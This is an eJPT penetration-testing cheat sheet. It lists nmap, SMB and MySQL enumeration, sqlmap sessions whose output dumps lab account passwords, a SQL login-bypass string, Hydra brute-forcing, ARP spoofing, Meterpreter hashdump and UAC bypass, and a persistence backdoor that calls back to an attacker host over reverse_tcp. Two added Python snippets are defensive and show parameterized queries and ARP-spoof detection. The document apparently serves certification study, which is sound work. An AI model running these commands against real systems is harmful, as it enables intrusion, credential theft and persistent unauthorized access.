EJPT Cheat Sheet
All the commands you need to pass the eLearnSecurity Junior Penetration Tester (eJPT)
Routing
View the existing routes
route
ip route
Add new routes manually
ip route add <destination-network/prefix> via <gateway>
example:
sudo ip route add 192.168.222.0/24 via 10.175.34.1
Enumeration and Scanning
Whois
Ping Sweep
fping -a -g <ip-subnet/subnet mask> 2>/dev/null
example:
fping -a -g 192.168.222.0/24 2>/dev/null
Nmap
# OS Detection, no ping
nmap -Pn -O 10.10.10.10
# default scripts (-sC), version detection (-sV)
nmap -sC -sV 10.10.10.10
# above + All ports
nmap -sC -sV -p- 10.10.10.10
# UDP version check
nmap -sU -sV 10.10.10.10
# SYN scan, version detection, OS detection, aggressive scan, skip host discovery (-Pn)
sudo nmap -sS -sV -O -A -Pn 172.16.64.182,199 > nmap.txt
# check for known vulnerabilities using the "vuln" script category
nmap --script=vuln -A 172.16.64.182,199 > nmap.txt
SMB/SAMBA
nbtscan
nbtscan -A 10.10.10.10
net view
net view 10.10.10.10
net use
# C$ - root of the C: drive
# ADMIN$ - Windows installation directory
# IPC$ - inter-process communication share (not browsable)
# null session: connect with an empty username and password
net use \\10.10.10.10\IPC$ '' /u:''
# The command completed successfully.
net use \\10.10.10.10\ADMIN$ '' /u:''
# System error 5 has occurred.
# Access is denied.
enum
# enumerate users
enum -U 10.10.10.10
# enumerate password policy
enum -P 10.10.10.10
nmblookup
nmblookup -A 10.10.10.10
smbclient
# -N: no password (null session)
smbclient -L //10.10.10.10 -N
mysql
# connect to a remote database server (-p alone prompts for the password;
# -pPASSWORD with no space passes it inline - a space would make mysql treat PASSWORD as the database name)
mysql -u USERNAME -p -h HOST DB
# select a database
use <db_name>;
# list tables
show tables;
# dump a table
select * from <table_name>;
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p 1 ⨯
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 465
Server version: 5.5.38-0+wheezy1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> use awdmgmt_accounts
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts |
+----------------------------+
1 row in set (0.340 sec)
MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email | password | displayname |
+----+--------------------+----------+-------------+
| 1 | admin@awdmgmt.labs | ENS7VvW8 | Admin |
+----+--------------------+----------+-------------+
SQLi and Sqlmap
sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
#list databases
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs
#select database and list tables
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D database_name --tables
#Dump specific database
sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump
# banner grabbing
sqlmap -u http://10.10.10.10/view.php?id=1 -b
# dump specified database
sqlmap -u http://10.10.10.10/view.php?id=1 -D selfie4you --dump
#sql login pages bypass
' or 1=1; -- -
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://10.124.211.96/newsdetails.php?id=33 --dbs awd --tables
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:54:56 /2021-09-12/
[02:54:57] [INFO] resuming back-end DBMS 'mysql'
[02:54:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26 AND 8959=8959
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=26 AND (SELECT 5543 FROM (SELECT(SLEEP(5)))qhai)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=26 UNION ALL SELECT CONCAT(0x71707a6271,0x794b62464a6e6f55584b525a78674e7a55684351744f5167664251617256566f54694f70614b5567,0x71786b6a71)-- -
---
[02:54:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: PHP 5.4.4, Apache 2.2.22
back-end DBMS: MySQL >= 5.0.12
[02:54:58] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema
[02:54:59] [INFO] fetching tables for databases: 'awd, information_schema'
Database: information_schema
[40 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: awd
[3 tables]
+---------------------------------------+
| accounts |
| awards |
| news |
+---------------------------------------+
[02:55:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.124.211.96'
[*] ending @ 02:55:00 /2021-09-12/
┌──(kali㉿kali)-[~/Desktop]
└─$ sqlmap -u http://10.124.211.96/newsdetails.php?id=33 -D awd -T accounts --dump
___
__H__
___ ___[(]_____ ___ ___ {1.5.7#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:56:48 /2021-09-12/
[02:56:48] [INFO] resuming back-end DBMS 'mysql'
[02:56:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26 AND 8959=8959
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=26 AND (SELECT 5543 FROM (SELECT(SLEEP(5)))qhai)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=26 UNION ALL SELECT CONCAT(0x71707a6271,0x794b62464a6e6f55584b525a78674e7a55684351744f5167664251617256566f54694f70614b5567,0x71786b6a71)-- -
---
[02:56:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.12
[02:56:49] [INFO] fetching columns for table 'accounts' in database 'awd'
[02:56:51] [INFO] fetching entries for table 'accounts' in database 'awd'
Database: awd
Table: accounts
[11 entries]
+----+-----------------------------------------------------+-------------+-------------------+
| id | email | password | displayname |
+----+-----------------------------------------------------+-------------+-------------------+
| 1 | admin@awdmgmt.labs | S3cr3tBOFH | Admin |
| 2 | porta.elit.a@adipiscingMaurismolestie.net | VUH74DYX6DO | Mallory Reed |
| 3 | ipsum.leo.elementum@Phasellusfermentumconvallis.org | GUC97VHY8HK | Katell Stewart |
| 4 | mauris.sit@torquent.edu | LPW27DSG6QE | Gemma Beck |
| 5 | Praesent.interdum@ametrisus.org | TWS34ORL6GX | Fuller Casey |
| 6 | Quisque.libero@Cum.ca | OSQ80TYZ6YW | Hu Miles |
| 7 | tincidunt.Donec.vitae@tempuseuligula.com | HOV82DUI9TF | Lacey Hawkins |
| 8 | dignissim.Maecenas@estcongue.org | TEO38KNA2UZ | Kaden Singleton |
| 9 | dictum@tempusrisusDonec.ca | LKK51JAO3PJ | Britanney Guzman |
| 10 | blandit.viverra.Donec@Suspendisse.net | PTS90MHF9XA | Aspen Byers |
| 11 | ligula@mollisDuis.ca | PLN49WZU6IB | Alexandra Cabrera |
+----+-----------------------------------------------------+-------------+-------------------+
[02:56:52] [INFO] table 'awd.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.124.211.96/dump/awd/accounts.csv'
[02:56:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.124.211.96'
[*] ending @ 02:56:52 /2021-09-12/
┌──(kali㉿kali)-[~/Desktop]
└─$
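The login bypass string listed above works only because the application splices user input into the SQL text. The following is an added example, not part of the cheat sheet: it builds a constructed SQLite user table (placeholder credentials, no real data), runs the page's payload against a concatenated query and against a parameterized query, and returns both outcomes so the difference is visible.

```python
import sqlite3

# Login-bypass string from the cheat sheet.
PAYLOAD = "' or 1=1; -- -"


def make_db():
    """Constructed in-memory user table; the credentials are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO accounts (email, password) VALUES (?, ?)",
        ("admin@example.test", "placeholder-password"),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """WHERE clause built by string concatenation.

    A quote in the input closes the string literal, so the remainder of the
    input is parsed as SQL: `email = '' or 1=1; -- -' AND password = '...'`.
    Everything after `--` is a comment, and `or 1=1` matches every row.
    """
    query = (
        "SELECT id FROM accounts WHERE email = '" + email
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, email, password):
    """Same lookup with bound parameters: the input stays data, never syntax."""
    query = "SELECT id FROM accounts WHERE email = ? AND password = ?"
    return conn.execute(query, (email, password)).fetchone() is not None


def demo():
    """Run both variants with valid credentials and with the payload."""
    conn = make_db()
    results = {
        "valid_creds_vulnerable": login_vulnerable(
            conn, "admin@example.test", "placeholder-password"),
        "valid_creds_parameterized": login_parameterized(
            conn, "admin@example.test", "placeholder-password"),
        # Attacker knows neither the email nor the password.
        "payload_vulnerable": login_vulnerable(conn, PAYLOAD, "anything"),
        "payload_parameterized": login_parameterized(conn, PAYLOAD, "anything"),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name}: {'login accepted' if accepted else 'login rejected'}")
```

The concatenated query accepts the payload with no valid credentials; the parameterized query rejects it while still accepting the real credentials. Prepared statements (or an ORM that uses them) are the fix sqlmap findings like the ones in the sessions above are pointing at.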
John for cracking
john --wordlist=/path/to/wordlist --users=users.txt hashfile
Hydra
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10
SMB / SAMBA
nmblookup -A 10.10.10.10
# list shares (null session)
smbclient -L //10.10.10.10 -N
# connect to a share (null session)
smbclient //10.10.10.10/share -N
enum4linux -a 10.10.10.10
ARP spoofing (Dsniff)
# forward intercepted packets on to the real destination hosts
echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof -i <interface> -t <target> -r <host>
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
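From the defender's side, the poisoning above shows up as ARP replies that rebind an IP address to a new MAC, and as one MAC answering for both the target and the gateway. The following is an added example, not from the cheat sheet: it runs a simple anomaly check over a constructed list of ARP replies (the addresses and locally administered MACs are made up, not captured traffic) and reports both symptoms. It generalizes slightly beyond the page by also flagging the single-MAC-many-IPs pattern.

```python
from collections import defaultdict

# Constructed ARP reply records: (seconds since start, sender IP, sender MAC).
# The 02:... MACs are locally administered placeholders, not real devices.
SAMPLE_ARP_REPLIES = [
    (0.0, "10.10.10.1", "02:00:00:00:00:01"),    # gateway (constructed)
    (0.5, "10.10.10.10", "02:00:00:00:00:10"),   # host A (constructed)
    (1.0, "10.10.10.11", "02:00:00:00:00:11"),   # host B (constructed)
    (30.0, "10.10.10.10", "02:00:00:00:00:aa"),  # host A's IP, different MAC
    (30.1, "10.10.10.11", "02:00:00:00:00:aa"),  # host B's IP, same new MAC
]


def detect_arp_anomalies(replies):
    """Return alert strings for ARP bindings that look like poisoning.

    Two symptoms are checked:
    - ip_mac_change: an IP that was already bound to one MAC is now
      announced with another (the classic spoofed-reply signature).
    - mac_multi_ip: one MAC claiming several IPs, which is what poisoning
      both ends of a conversation looks like. Routers and proxies can do
      this legitimately, so treat it as a lead, not proof.
    """
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    alerts = []

    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip_to_macs[ip] and mac not in ip_to_macs[ip]:
            alerts.append(
                f"{ts:.1f}s ip_mac_change {ip} was {sorted(ip_to_macs[ip])} now {mac}"
            )
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)

    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            alerts.append(f"mac_multi_ip {mac} claims {sorted(ips)}")

    return alerts


if __name__ == "__main__":
    for alert in detect_arp_anomalies(SAMPLE_ARP_REPLIES):
        print(alert)
```

On a real host the same check can be fed from the kernel's neighbour cache (`ip neigh`) sampled over time, or from an ARP capture; static ARP entries for the gateway and dynamic ARP inspection on managed switches remove the underlying weakness rather than just detecting it.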
Metasploit
search x
use x
info
show options
show advanced
Meterpreter
background
sessions -l
sessions -i 1
sysinfo
ifconfig
route
# get which user is running process
getuid
# privilege escalation ('User Account Control' GPO policy may prevent this)
getsystem
# bypass the 'User Account Control' restriction to privesc (msfconsole module, run against the session)
use exploit/windows/local/bypassuac
# transferring files
download x /root/
upload x C:\\Windows
# run standard operating system shell
shell
use post/windows/gather/hashdump
Meterpreter - persistence backdoor
# persistent backdoor - need meterpreter session
msf > use exploit/windows/local/s4u_persistence
msf (s4u_persistence) > set session 2
#session => 2
msf (s4u_persistence) > set trigger logon
#trigger => logon
msf (s4u_persistence) > set payload windows/meterpreter/reverse_tcp
msf (s4u_persistence) > set lhost 1.2.3.4
msf (s4u_persistence) > set lport 1234
msf (s4u_persistence) > exploit
msf (s4u_persistence) > use exploit/multi/handler
msf (handler) > set payload windows/meterpreter/reverse_tcp
msf (handler) > exploit
# once the victim restarts and logs on, we get a new meterpreter shell